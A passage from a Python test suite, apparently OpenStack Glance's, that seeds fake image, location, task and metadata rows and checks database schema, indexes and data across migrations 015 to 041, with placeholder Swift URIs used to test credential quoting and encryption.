db_utils.get_table(engine, 'images')\n unquoted_locations = [\n 'swift://acct:usr:pass@example.com/container/obj-id',\n 'file://foo',\n ]\n now = datetime.datetime.now()\n temp = dict(deleted=False,\n created_at=now,\n updated_at=now,\n status='active',\n is_public=True,\n min_disk=0,\n min_ram=0)\n data = []\n for i, location in enumerate(unquoted_locations):\n temp.update(location=location, id=str(uuid.uuid4()))\n data.append(temp)\n images.insert().values(temp).execute()\n return data\n\n def _check_015(self, engine, data):\n images = db_utils.get_table(engine, 'images')\n quoted_locations = [\n 'swift://acct%3Ausr:pass@example.com/container/obj-id',\n 'file://foo',\n ]\n result = images.select().execute()\n locations = map(lambda x: x['location'], result)\n for loc in quoted_locations:\n self.assertIn(loc, locations)\n\n def _pre_upgrade_016(self, engine):\n images = db_utils.get_table(engine, 'images')\n now = datetime.datetime.now()\n temp = dict(deleted=False,\n created_at=now,\n updated_at=now,\n status='active',\n is_public=True,\n min_disk=0,\n min_ram=0,\n id='fake-image-id1')\n images.insert().values(temp).execute()\n image_members = db_utils.get_table(engine, 'image_members')\n now = datetime.datetime.now()\n data = {'deleted': False,\n 'created_at': now,\n 'member': 'fake-member',\n 'updated_at': now,\n 'can_share': False,\n 'image_id': 'fake-image-id1'}\n image_members.insert().values(data).execute()\n return data\n\n def _check_016(self, engine, data):\n image_members = db_utils.get_table(engine, 'image_members')\n self.assertIn('status', image_members.c,\n \"'status' column found in image_members table \"\n \"columns! image_members table columns: %s\"\n % image_members.c.keys())\n\n def test_legacy_parse_swift_uri_017(self):\n metadata_encryption_key = 'a' * 16\n CONF.set_override('metadata_encryption_key', metadata_encryption_key)\n self.addCleanup(CONF.reset)\n (legacy_parse_uri, encrypt_location) = from_migration_import(\n '017_quote_encrypted_swift_credentials', ['legacy_parse_uri',\n 'encrypt_location'])\n\n uri = legacy_parse_uri('swift://acct:usr:pass@example.com'\n '/container/obj-id', True)\n self.assertTrue(uri, encrypt_location(\n 'swift://acct%3Ausr:pass@example.com/container/obj-id'))\n\n self._assert_invalid_swift_uri_raises_bad_store_uri(legacy_parse_uri)\n\n def _pre_upgrade_017(self, engine):\n metadata_encryption_key = 'a' * 16\n CONF.set_override('metadata_encryption_key', metadata_encryption_key)\n self.addCleanup(CONF.reset)\n images = db_utils.get_table(engine, 'images')\n unquoted = 'swift://acct:usr:pass@example.com/container/obj-id'\n encrypted_unquoted = crypt.urlsafe_encrypt(\n metadata_encryption_key,\n unquoted, 64)\n data = []\n now = datetime.datetime.now()\n temp = dict(deleted=False,\n created_at=now,\n updated_at=now,\n status='active',\n is_public=True,\n min_disk=0,\n min_ram=0,\n location=encrypted_unquoted,\n id='fakeid1')\n images.insert().values(temp).execute()\n\n locations = [\n 'file://ab',\n 'file://abc',\n 'swift://acct3A%foobar:pass@example.com/container/obj-id2'\n ]\n\n now = datetime.datetime.now()\n temp = dict(deleted=False,\n created_at=now,\n updated_at=now,\n status='active',\n is_public=True,\n min_disk=0,\n min_ram=0)\n for i, location in enumerate(locations):\n temp.update(location=location, id=str(uuid.uuid4()))\n data.append(temp)\n images.insert().values(temp).execute()\n return data\n\n def _check_017(self, engine, data):\n metadata_encryption_key = 'a' * 16\n quoted = 'swift://acct%3Ausr:pass@example.com/container/obj-id'\n images = db_utils.get_table(engine, 'images')\n result = images.select().execute()\n locations = map(lambda x: x['location'], result)\n actual_location = []\n for location in locations:\n if location:\n try:\n temp_loc = crypt.urlsafe_decrypt(metadata_encryption_key,\n location)\n actual_location.append(temp_loc)\n except TypeError:\n actual_location.append(location)\n except ValueError:\n actual_location.append(location)\n\n self.assertIn(quoted, actual_location)\n loc_list = ['file://ab',\n 'file://abc',\n 'swift://acct3A%foobar:pass@example.com/container/obj-id2']\n\n for location in loc_list:\n if location not in actual_location:\n self.fail(_(\"location: %s data lost\") % location)\n\n def _pre_upgrade_019(self, engine):\n images = db_utils.get_table(engine, 'images')\n now = datetime.datetime.now()\n base_values = {\n 'deleted': False,\n 'created_at': now,\n 'updated_at': now,\n 'status': 'active',\n 'is_public': True,\n 'min_disk': 0,\n 'min_ram': 0,\n }\n data = [\n {'id': 'fake-19-1', 'location': 'http://glance.example.com'},\n # NOTE(bcwaldon): images with a location of None should\n # not be migrated\n {'id': 'fake-19-2', 'location': None},\n ]\n map(lambda image: image.update(base_values), data)\n for image in data:\n images.insert().values(image).execute()\n return data\n\n def _check_019(self, engine, data):\n image_locations = db_utils.get_table(engine, 'image_locations')\n records = image_locations.select().execute().fetchall()\n locations = {il.image_id: il.value for il in records}\n self.assertEqual('http://glance.example.com',\n locations.get('fake-19-1'))\n\n def _check_020(self, engine, data):\n images = db_utils.get_table(engine, 'images')\n self.assertNotIn('location', images.c)\n\n def _pre_upgrade_026(self, engine):\n image_locations = db_utils.get_table(engine, 'image_locations')\n\n now = datetime.datetime.now()\n image_id = 'fake_id'\n url = 'file:///some/place/onthe/fs'\n\n images = db_utils.get_table(engine, 'images')\n temp = dict(deleted=False,\n created_at=now,\n updated_at=now,\n status='active',\n is_public=True,\n min_disk=0,\n min_ram=0,\n id=image_id)\n images.insert().values(temp).execute()\n\n temp = dict(deleted=False,\n created_at=now,\n updated_at=now,\n image_id=image_id,\n value=url)\n image_locations.insert().values(temp).execute()\n return image_id\n\n def _check_026(self, engine, data):\n image_locations = db_utils.get_table(engine, 'image_locations')\n results = image_locations.select().where(\n image_locations.c.image_id == data).execute()\n\n r = list(results)\n self.assertEqual(1, len(r))\n self.assertEqual('file:///some/place/onthe/fs', r[0]['value'])\n self.assertIn('meta_data', r[0])\n x = pickle.loads(r[0]['meta_data'])\n self.assertEqual({}, x)\n\n def _check_027(self, engine, data):\n table = \"images\"\n index = \"checksum_image_idx\"\n columns = [\"checksum\"]\n\n meta = sqlalchemy.MetaData()\n meta.bind = engine\n\n new_table = sqlalchemy.Table(table, meta, autoload=True)\n\n index_data = [(idx.name, idx.columns.keys())\n for idx in new_table.indexes]\n\n self.assertIn((index, columns), index_data)\n\n def _check_028(self, engine, data):\n owner_index = \"owner_image_idx\"\n columns = [\"owner\"]\n\n images_table = db_utils.get_table(engine, 'images')\n\n index_data = [(idx.name, idx.columns.keys())\n for idx in images_table.indexes\n if idx.name == owner_index]\n\n self.assertIn((owner_index, columns), index_data)\n\n def _post_downgrade_028(self, engine):\n owner_index = \"owner_image_idx\"\n columns = [\"owner\"]\n\n images_table = db_utils.get_table(engine, 'images')\n\n index_data = [(idx.name, idx.columns.keys())\n for idx in images_table.indexes\n if idx.name == owner_index]\n\n self.assertNotIn((owner_index, columns), index_data)\n\n def _pre_upgrade_029(self, engine):\n image_locations = db_utils.get_table(engine, 'image_locations')\n\n meta_data = {'somelist': ['a', 'b', 'c'], 'avalue': 'hello',\n 'adict': {}}\n\n now = datetime.datetime.now()\n image_id = 'fake_029_id'\n url = 'file:///some/place/onthe/fs029'\n\n images = db_utils.get_table(engine, 'images')\n temp = dict(deleted=False,\n created_at=now,\n updated_at=now,\n status='active',\n is_public=True,\n min_disk=0,\n min_ram=0,\n id=image_id)\n images.insert().values(temp).execute()\n\n pickle_md = pickle.dumps(meta_data)\n temp = dict(deleted=False,\n created_at=now,\n updated_at=now,\n image_id=image_id,\n value=url,\n meta_data=pickle_md)\n image_locations.insert().values(temp).execute()\n\n return meta_data, image_id\n\n def _check_029(self, engine, data):\n meta_data = data[0]\n image_id = data[1]\n image_locations = db_utils.get_table(engine, 'image_locations')\n\n records = image_locations.select().where(\n image_locations.c.image_id == image_id).execute().fetchall()\n\n for r in records:\n d = jsonutils.loads(r['meta_data'])\n self.assertEqual(d, meta_data)\n\n def _post_downgrade_029(self, engine):\n image_id = 'fake_029_id'\n\n image_locations = db_utils.get_table(engine, 'image_locations')\n\n records = image_locations.select().where(\n image_locations.c.image_id == image_id).execute().fetchall()\n\n for r in records:\n md = r['meta_data']\n d = pickle.loads(md)\n self.assertIsInstance(d, dict)\n\n def _check_030(self, engine, data):\n table = \"tasks\"\n index_type = ('ix_tasks_type', ['type'])\n index_status = ('ix_tasks_status', ['status'])\n index_owner = ('ix_tasks_owner', ['owner'])\n index_deleted = ('ix_tasks_deleted', ['deleted'])\n index_updated_at = ('ix_tasks_updated_at', ['updated_at'])\n\n meta = sqlalchemy.MetaData()\n meta.bind = engine\n\n tasks_table = sqlalchemy.Table(table, meta, autoload=True)\n\n index_data = [(idx.name, idx.columns.keys())\n for idx in tasks_table.indexes]\n\n self.assertIn(index_type, index_data)\n self.assertIn(index_status, index_data)\n self.assertIn(index_owner, index_data)\n self.assertIn(index_deleted, index_data)\n self.assertIn(index_updated_at, index_data)\n\n expected = [u'id',\n u'type',\n u'status',\n u'owner',\n u'input',\n u'result',\n u'message',\n u'expires_at',\n u'created_at',\n u'updated_at',\n u'deleted_at',\n u'deleted']\n\n # NOTE(flwang): Skip the column type checking for now since Jenkins is\n # using sqlalchemy.dialects.postgresql.base.TIMESTAMP instead of\n # DATETIME which is using by mysql and sqlite.\n col_data = [col.name for col in tasks_table.columns]\n self.assertEqual(expected, col_data)\n\n def _post_downgrade_030(self, engine):\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine, 'tasks')\n\n def _pre_upgrade_031(self, engine):\n images = db_utils.get_table(engine, 'images')\n now = datetime.datetime.now()\n image_id = 'fake_031_id'\n temp = dict(deleted=False,\n created_at=now,\n updated_at=now,\n status='active',\n is_public=True,\n min_disk=0,\n min_ram=0,\n id=image_id)\n images.insert().values(temp).execute()\n\n locations_table = db_utils.get_table(engine, 'image_locations')\n locations = [\n ('file://ab', '{\"a\": \"yo yo\"}'),\n ('file://ab', '{}'),\n ('file://ab', '{}'),\n ('file://ab1', '{\"a\": \"that one, please\"}'),\n ('file://ab1', '{\"a\": \"that one, please\"}'),\n ]\n temp = dict(deleted=False,\n created_at=now,\n updated_at=now,\n image_id=image_id)\n\n for location, metadata in locations:\n temp.update(value=location, meta_data=metadata)\n locations_table.insert().values(temp).execute()\n return image_id\n\n def _check_031(self, engine, image_id):\n locations_table = db_utils.get_table(engine, 'image_locations')\n result = locations_table.select().where(\n locations_table.c.image_id == image_id).execute().fetchall()\n\n locations = set([(x['value'], x['meta_data']) for x in result])\n actual_locations = set([\n ('file://ab', '{\"a\": \"yo yo\"}'),\n ('file://ab', '{}'),\n ('file://ab1', '{\"a\": \"that one, please\"}'),\n ])\n self.assertFalse(actual_locations.symmetric_difference(locations))\n\n def _pre_upgrade_032(self, engine):\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine, 'task_info')\n\n tasks = db_utils.get_table(engine, 'tasks')\n now = datetime.datetime.now()\n base_values = {\n 'deleted': False,\n 'created_at': now,\n 'updated_at': now,\n 'status': 'active',\n 'owner': 'TENANT',\n 'type': 'import',\n }\n data = [\n {\n 'id': 'task-1',\n 'input': 'some input',\n 'message': None,\n 'result': 'successful'\n },\n {\n 'id': 'task-2',\n 'input': None,\n 'message': None,\n 'result': None\n },\n ]\n map(lambda task: task.update(base_values), data)\n for task in data:\n tasks.insert().values(task).execute()\n return data\n\n def _check_032(self, engine, data):\n task_info_table = db_utils.get_table(engine, 'task_info')\n\n task_info_refs = task_info_table.select().execute().fetchall()\n\n self.assertEqual(2, len(task_info_refs))\n\n for x in range(len(task_info_refs)):\n self.assertEqual(task_info_refs[x].task_id, data[x]['id'])\n self.assertEqual(task_info_refs[x].input, data[x]['input'])\n self.assertEqual(task_info_refs[x].result, data[x]['result'])\n self.assertIsNone(task_info_refs[x].message)\n\n tasks_table = db_utils.get_table(engine, 'tasks')\n self.assertNotIn('input', tasks_table.c)\n self.assertNotIn('result', tasks_table.c)\n self.assertNotIn('message', tasks_table.c)\n\n def _post_downgrade_032(self, engine):\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine, 'task_info')\n\n tasks_table = db_utils.get_table(engine, 'tasks')\n records = tasks_table.select().execute().fetchall()\n self.assertEqual(2, len(records))\n\n tasks = {t.id: t for t in records}\n\n task_1 = tasks.get('task-1')\n self.assertEqual('some input', task_1.input)\n self.assertEqual('successful', task_1.result)\n self.assertIsNone(task_1.message)\n\n task_2 = tasks.get('task-2')\n self.assertIsNone(task_2.input)\n self.assertIsNone(task_2.result)\n self.assertIsNone(task_2.message)\n\n def _pre_upgrade_033(self, engine):\n images = db_utils.get_table(engine, 'images')\n image_locations = db_utils.get_table(engine, 'image_locations')\n\n now = datetime.datetime.now()\n image_id = 'fake_id_028_%d'\n url = 'file:///some/place/onthe/fs_%d'\n status_list = ['active', 'saving', 'queued', 'killed',\n 'pending_delete', 'deleted']\n image_id_list = []\n\n for (idx, status) in enumerate(status_list):\n temp = dict(deleted=False,\n created_at=now,\n updated_at=now,\n status=status,\n is_public=True,\n min_disk=0,\n min_ram=0,\n id=image_id % idx)\n images.insert().values(temp).execute()\n\n temp = dict(deleted=False,\n created_at=now,\n updated_at=now,\n image_id=image_id % idx,\n value=url % idx)\n image_locations.insert().values(temp).execute()\n\n image_id_list.append(image_id % idx)\n return image_id_list\n\n def _check_033(self, engine, data):\n image_locations = db_utils.get_table(engine, 'image_locations')\n\n self.assertIn('status', image_locations.c)\n self.assertEqual(30, image_locations.c['status'].type.length)\n\n status_list = ['active', 'active', 'active',\n 'deleted', 'pending_delete', 'deleted']\n\n for (idx, image_id) in enumerate(data):\n results = image_locations.select().where(\n image_locations.c.image_id == image_id).execute()\n r = list(results)\n self.assertEqual(1, len(r))\n self.assertIn('status', r[0])\n self.assertEqual(r[0]['status'], status_list[idx])\n\n def _post_downgrade_033(self, engine):\n image_locations = db_utils.get_table(engine, 'image_locations')\n self.assertNotIn('status', image_locations.c)\n\n def _pre_upgrade_034(self, engine):\n images = db_utils.get_table(engine, 'images')\n\n now = datetime.datetime.now()\n image_id = 'fake_id_034'\n temp = dict(deleted=False,\n created_at=now,\n status='active',\n is_public=True,\n min_disk=0,\n min_ram=0,\n id=image_id)\n images.insert().values(temp).execute()\n\n def _check_034(self, engine, data):\n images = db_utils.get_table(engine, 'images')\n self.assertIn('virtual_size', images.c)\n\n result = (images.select()\n .where(images.c.id == 'fake_id_034')\n .execute().fetchone())\n self.assertIsNone(result.virtual_size)\n\n def _post_downgrade_034(self, engine):\n images = db_utils.get_table(engine, 'images')\n self.assertNotIn('virtual_size', images.c)\n\n def _pre_upgrade_035(self, engine):\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine, 'metadef_namespaces')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine, 'metadef_properties')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine, 'metadef_objects')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine, 'metadef_resource_types')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine,\n 'metadef_namespace_resource_types')\n\n def _check_035(self, engine, data):\n meta = sqlalchemy.MetaData()\n meta.bind = engine\n\n # metadef_namespaces\n table = sqlalchemy.Table(\"metadef_namespaces\", meta, autoload=True)\n index_namespace = ('ix_namespaces_namespace', ['namespace'])\n index_data = [(idx.name, idx.columns.keys())\n for idx in table.indexes]\n self.assertIn(index_namespace, index_data)\n\n expected_cols = [u'id',\n u'namespace',\n u'display_name',\n u'description',\n u'visibility',\n u'protected',\n u'owner',\n u'created_at',\n u'updated_at']\n col_data = [col.name for col in table.columns]\n self.assertEqual(expected_cols, col_data)\n\n # metadef_objects\n table = sqlalchemy.Table(\"metadef_objects\", meta, autoload=True)\n index_namespace_id_name = (\n 'ix_objects_namespace_id_name', ['namespace_id', 'name'])\n index_data = [(idx.name, idx.columns.keys())\n for idx in table.indexes]\n self.assertIn(index_namespace_id_name, index_data)\n\n expected_cols = [u'id',\n u'namespace_id',\n u'name',\n u'description',\n u'required',\n u'schema',\n u'created_at',\n u'updated_at']\n col_data = [col.name for col in table.columns]\n self.assertEqual(expected_cols, col_data)\n\n # metadef_properties\n table = sqlalchemy.Table(\"metadef_properties\", meta, autoload=True)\n index_namespace_id_name = (\n 'ix_metadef_properties_namespace_id_name',\n ['namespace_id', 'name'])\n index_data = [(idx.name, idx.columns.keys())\n for idx in table.indexes]\n self.assertIn(index_namespace_id_name, index_data)\n\n expected_cols = [u'id',\n u'namespace_id',\n u'name',\n u'schema',\n u'created_at',\n u'updated_at']\n col_data = [col.name for col in table.columns]\n self.assertEqual(expected_cols, col_data)\n\n # metadef_resource_types\n table = sqlalchemy.Table(\n \"metadef_resource_types\", meta, autoload=True)\n index_resource_types_name = (\n 'ix_metadef_resource_types_name', ['name'])\n index_data = [(idx.name, idx.columns.keys())\n for idx in table.indexes]\n self.assertIn(index_resource_types_name, index_data)\n\n expected_cols = [u'id',\n u'name',\n u'protected',\n u'created_at',\n u'updated_at']\n col_data = [col.name for col in table.columns]\n self.assertEqual(expected_cols, col_data)\n\n # metadef_namespace_resource_types\n table = sqlalchemy.Table(\n \"metadef_namespace_resource_types\", meta, autoload=True)\n index_ns_res_types_res_type_id_ns_id = (\n 'ix_metadef_ns_res_types_res_type_id_ns_id',\n ['resource_type_id', 'namespace_id'])\n index_data = [(idx.name, idx.columns.keys())\n for idx in table.indexes]\n self.assertIn(index_ns_res_types_res_type_id_ns_id, index_data)\n\n expected_cols = [u'resource_type_id',\n u'namespace_id',\n u'properties_target',\n u'prefix',\n u'created_at',\n u'updated_at']\n col_data = [col.name for col in table.columns]\n self.assertEqual(expected_cols, col_data)\n\n def _post_downgrade_035(self, engine):\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine, 'metadef_namespaces')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine, 'metadef_properties')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine, 'metadef_objects')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine, 'metadef_resource_types')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine,\n 'metadef_namespace_resource_types')\n\n def _pre_upgrade_036(self, engine):\n meta = sqlalchemy.MetaData()\n meta.bind = engine\n\n # metadef_objects\n table = sqlalchemy.Table(\"metadef_objects\", meta, autoload=True)\n expected_cols = [u'id',\n u'namespace_id',\n u'name',\n u'description',\n u'required',\n u'schema',\n u'created_at',\n u'updated_at']\n col_data = [col.name for col in table.columns]\n self.assertEqual(expected_cols, col_data)\n\n # metadef_properties\n table = sqlalchemy.Table(\"metadef_properties\", meta, autoload=True)\n expected_cols = [u'id',\n u'namespace_id',\n u'name',\n u'schema',\n u'created_at',\n u'updated_at']\n col_data = [col.name for col in table.columns]\n self.assertEqual(expected_cols, col_data)\n\n def _check_036(self, engine, data):\n meta = sqlalchemy.MetaData()\n meta.bind = engine\n\n # metadef_objects\n table = sqlalchemy.Table(\"metadef_objects\", meta, autoload=True)\n expected_cols = [u'id',\n u'namespace_id',\n u'name',\n u'description',\n u'required',\n u'json_schema',\n u'created_at',\n u'updated_at']\n col_data = [col.name for col in table.columns]\n self.assertEqual(expected_cols, col_data)\n\n # metadef_properties\n table = sqlalchemy.Table(\"metadef_properties\", meta, autoload=True)\n expected_cols = [u'id',\n u'namespace_id',\n u'name',\n u'json_schema',\n u'created_at',\n u'updated_at']\n col_data = [col.name for col in table.columns]\n self.assertEqual(expected_cols, col_data)\n\n def _post_downgrade_036(self, engine):\n meta = sqlalchemy.MetaData()\n meta.bind = engine\n\n # metadef_objects\n table = sqlalchemy.Table(\"metadef_objects\", meta, autoload=True)\n expected_cols = [u'id',\n u'namespace_id',\n u'name',\n u'description',\n u'required',\n u'schema',\n u'created_at',\n u'updated_at']\n col_data = [col.name for col in table.columns]\n self.assertEqual(expected_cols, col_data)\n\n # metadef_properties\n table = sqlalchemy.Table(\"metadef_properties\", meta, autoload=True)\n expected_cols = [u'id',\n u'namespace_id',\n u'name',\n u'schema',\n u'created_at',\n u'updated_at']\n col_data = [col.name for col in table.columns]\n self.assertEqual(expected_cols, col_data)\n\n def _check_037(self, engine, data):\n if engine.name == 'mysql':\n self.assertFalse(unique_constraint_exist('image_id',\n 'image_properties',\n engine))\n\n self.assertTrue(unique_constraint_exist(\n 'ix_image_properties_image_id_name',\n 'image_properties',\n engine))\n\n image_members = db_utils.get_table(engine, 'image_members')\n images = db_utils.get_table(engine, 'images')\n\n self.assertFalse(image_members.c.status.nullable)\n self.assertFalse(images.c.protected.nullable)\n\n now = datetime.datetime.now()\n temp = dict(\n deleted=False,\n created_at=now,\n status='active',\n is_public=True,\n min_disk=0,\n min_ram=0,\n id='fake_image_035'\n )\n images.insert().values(temp).execute()\n\n image = (images.select()\n .where(images.c.id == 'fake_image_035')\n .execute().fetchone())\n\n self.assertFalse(image['protected'])\n\n temp = dict(\n deleted=False,\n created_at=now,\n image_id='fake_image_035',\n member='fake_member',\n can_share=True,\n id=3\n )\n\n image_members.insert().values(temp).execute()\n\n image_member = (image_members.select()\n .where(image_members.c.id == 3)\n .execute().fetchone())\n\n self.assertEqual('pending', image_member['status'])\n\n def _post_downgrade_037(self, engine):\n if engine.name == 'mysql':\n self.assertTrue(unique_constraint_exist('image_id',\n 'image_properties',\n engine))\n\n if engine.name == 'postgresql':\n self.assertTrue(index_exist('ix_image_properties_image_id_name',\n 'image_properties', engine))\n\n self.assertFalse(unique_constraint_exist(\n 'ix_image_properties_image_id_name',\n 'image_properties',\n engine))\n\n image_members = db_utils.get_table(engine, 'image_members')\n images = db_utils.get_table(engine, 'images')\n\n self.assertTrue(image_members.c.status.nullable)\n self.assertTrue(images.c.protected.nullable)\n\n now = datetime.datetime.now()\n temp = dict(\n deleted=False,\n created_at=now,\n status='active',\n is_public=True,\n min_disk=0,\n min_ram=0,\n id='fake_image_035_d'\n )\n images.insert().values(temp).execute()\n\n image = (images.select()\n .where(images.c.id == 'fake_image_035_d')\n .execute().fetchone())\n\n self.assertIsNone(image['protected'])\n\n temp = dict(\n deleted=False,\n created_at=now,\n image_id='fake_image_035_d',\n member='fake_member',\n can_share=True,\n id=4\n )\n\n image_members.insert().values(temp).execute()\n\n image_member = (image_members.select()\n .where(image_members.c.id == 4)\n .execute().fetchone())\n\n self.assertIsNone(image_member['status'])\n\n def _pre_upgrade_038(self, engine):\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine, 'metadef_tags')\n\n def _check_038(self, engine, data):\n meta = sqlalchemy.MetaData()\n meta.bind = engine\n\n # metadef_tags\n table = sqlalchemy.Table(\"metadef_tags\", meta, autoload=True)\n expected_cols = [u'id',\n u'namespace_id',\n u'name',\n u'created_at',\n u'updated_at']\n col_data = [col.name for col in table.columns]\n self.assertEqual(expected_cols, col_data)\n\n def _post_downgrade_038(self, engine):\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine, 'metadef_tags')\n\n def _check_039(self, engine, data):\n meta = sqlalchemy.MetaData()\n meta.bind = engine\n\n metadef_namespaces = sqlalchemy.Table('metadef_namespaces', meta,\n autoload=True)\n metadef_properties = sqlalchemy.Table('metadef_properties', meta,\n autoload=True)\n metadef_objects = sqlalchemy.Table('metadef_objects', meta,\n autoload=True)\n metadef_ns_res_types = sqlalchemy.Table(\n 'metadef_namespace_resource_types',\n meta, autoload=True)\n metadef_resource_types = sqlalchemy.Table('metadef_resource_types',\n meta, autoload=True)\n\n tables = [metadef_namespaces, metadef_properties, metadef_objects,\n metadef_ns_res_types, metadef_resource_types]\n\n for table in tables:\n for index_name in ['ix_namespaces_namespace',\n 'ix_objects_namespace_id_name',\n 'ix_metadef_properties_namespace_id_name']:\n self.assertFalse(index_exist(index_name, table.name, engine))\n for uc_name in ['resource_type_id', 'namespace', 'name',\n 'namespace_id',\n 'metadef_objects_namespace_id_name_key',\n 'metadef_properties_namespace_id_name_key']:\n self.assertFalse(unique_constraint_exist(uc_name, table.name,\n engine))\n\n self.assertTrue(index_exist('ix_metadef_ns_res_types_namespace_id',\n metadef_ns_res_types.name, engine))\n\n self.assertTrue(index_exist('ix_metadef_namespaces_namespace',\n metadef_namespaces.name, engine))\n\n self.assertTrue(index_exist('ix_metadef_namespaces_owner',\n metadef_namespaces.name, engine))\n\n self.assertTrue(index_exist('ix_metadef_objects_name',\n metadef_objects.name, engine))\n\n self.assertTrue(index_exist('ix_metadef_objects_namespace_id',\n metadef_objects.name, engine))\n\n self.assertTrue(index_exist('ix_metadef_properties_name',\n metadef_properties.name, engine))\n\n self.assertTrue(index_exist('ix_metadef_properties_namespace_id',\n metadef_properties.name, engine))\n\n def _post_downgrade_039(self, engine):\n meta = sqlalchemy.MetaData()\n meta.bind = engine\n\n metadef_namespaces = sqlalchemy.Table('metadef_namespaces', meta,\n autoload=True)\n metadef_properties = sqlalchemy.Table('metadef_properties', meta,\n autoload=True)\n metadef_objects = sqlalchemy.Table('metadef_objects', meta,\n autoload=True)\n metadef_ns_res_types = sqlalchemy.Table(\n 'metadef_namespace_resource_types',\n meta, autoload=True)\n metadef_resource_types = sqlalchemy.Table('metadef_resource_types',\n meta, autoload=True)\n\n self.assertFalse(index_exist('ix_metadef_ns_res_types_namespace_id',\n metadef_ns_res_types.name, engine))\n\n self.assertFalse(index_exist('ix_metadef_namespaces_namespace',\n metadef_namespaces.name, engine))\n\n self.assertFalse(index_exist('ix_metadef_namespaces_owner',\n metadef_namespaces.name, engine))\n\n self.assertFalse(index_exist('ix_metadef_objects_name',\n metadef_objects.name, engine))\n\n self.assertFalse(index_exist('ix_metadef_objects_namespace_id',\n metadef_objects.name, engine))\n\n self.assertFalse(index_exist('ix_metadef_properties_name',\n metadef_properties.name, engine))\n\n self.assertFalse(index_exist('ix_metadef_properties_namespace_id',\n metadef_properties.name, engine))\n\n self.assertTrue(index_exist('ix_namespaces_namespace',\n metadef_namespaces.name, engine))\n\n self.assertTrue(index_exist('ix_objects_namespace_id_name',\n metadef_objects.name, engine))\n\n self.assertTrue(index_exist('ix_metadef_properties_namespace_id_name',\n metadef_properties.name, engine))\n\n if engine.name == 'postgresql':\n inspector = inspect(engine)\n\n self.assertEqual(1, len(inspector.get_unique_constraints(\n 'metadef_objects')))\n\n self.assertEqual(1, len(inspector.get_unique_constraints(\n 'metadef_properties')))\n\n if engine.name == 'mysql':\n self.assertTrue(unique_constraint_exist(\n 'namespace_id', metadef_properties.name, engine))\n\n self.assertTrue(unique_constraint_exist(\n 'namespace_id', metadef_objects.name, engine))\n\n self.assertTrue(unique_constraint_exist(\n 'resource_type_id', metadef_ns_res_types.name, engine))\n\n self.assertTrue(unique_constraint_exist(\n 'namespace', metadef_namespaces.name, engine))\n\n self.assertTrue(unique_constraint_exist(\n 'name', metadef_resource_types.name, engine))\n\n def _check_040(self, engine, data):\n meta = sqlalchemy.MetaData()\n meta.bind = engine\n metadef_tags = sqlalchemy.Table('metadef_tags', meta, autoload=True)\n\n if engine.name == 'mysql':\n self.assertFalse(index_exist('namespace_id',\n metadef_tags.name, engine))\n\n def _pre_upgrade_041(self, engine):\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine,\n 'artifacts')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine,\n 'artifact_tags')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine,\n 'artifact_properties')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine,\n 'artifact_blobs')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine,\n 'artifact_dependencies')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine,\n 'artifact_locations')\n\n def _check_041(self, engine, data):\n artifacts_indices = [('ix_artifact_name_and_version',\n ['name', 'version_prefix', 'version_suffix']),\n ('ix_artifact_type',\n ['type_name',\n 'type_version_prefix',\n 'type_version_suffix']),\n ('ix_artifact_state', ['state']),\n ('ix_artifact_visibility', ['visibility']),\n ('ix_artifact_owner', ['owner'])]\n artifacts_columns = ['id',\n 'name',\n 'type_name',\n 'type_version_prefix',\n 'type_version_suffix',\n 'type_version_meta',\n 'version_prefix',\n 'version_suffix',\n 'version_meta',\n 'description',\n 'visibility',\n 'state',\n 'owner',\n 'created_at',\n 'updated_at',\n 'deleted_at',\n 'published_at']\n self.assert_table(engine, 'artifacts', artifacts_indices,\n artifacts_columns)\n\n tags_indices = [('ix_artifact_tags_artifact_id', ['artifact_id']),\n ('ix_artifact_tags_artifact_id_tag_value',\n ['artifact_id',\n 'value'])]\n tags_columns = ['id',\n 'artifact_id',\n 'value',\n 'created_at',\n 'updated_at']\n self.assert_table(engine, 'artifact_tags', tags_indices, tags_columns)\n\n prop_indices = [\n ('ix_artifact_properties_artifact_id', ['artifact_id']),\n ('ix_artifact_properties_name', ['name'])]\n prop_columns = ['id',\n 'artifact_id',\n 'name',\n 'string_value',\n 'int_value',\n 'numeric_value',\n 'bool_value',\n 'text_value',\n 'created_at',\n 'updated_at',\n 'position']\n self.assert_table(engine, 'artifact_properties', prop_indices,\n prop_columns)\n\n blobs_indices = [\n ('ix_artifact_blobs_artifact_id', ['artifact_id']),\n ('ix_artifact_blobs_name', ['name'])]\n blobs_columns = ['id',\n 'artifact_id',\n 'size',\n 'checksum',\n 'name',\n 'item_key',\n 'position',\n 'created_at',\n 'updated_at']\n self.assert_table(engine, 'artifact_blobs', blobs_indices,\n blobs_columns)\n\n dependencies_indices = [\n ('ix_artifact_dependencies_source_id', ['artifact_source']),\n ('ix_artifact_dependencies_direct_dependencies',\n ['artifact_source', 'is_direct']),\n ('ix_artifact_dependencies_dest_id', ['artifact_dest']),\n ('ix_artifact_dependencies_origin_id', 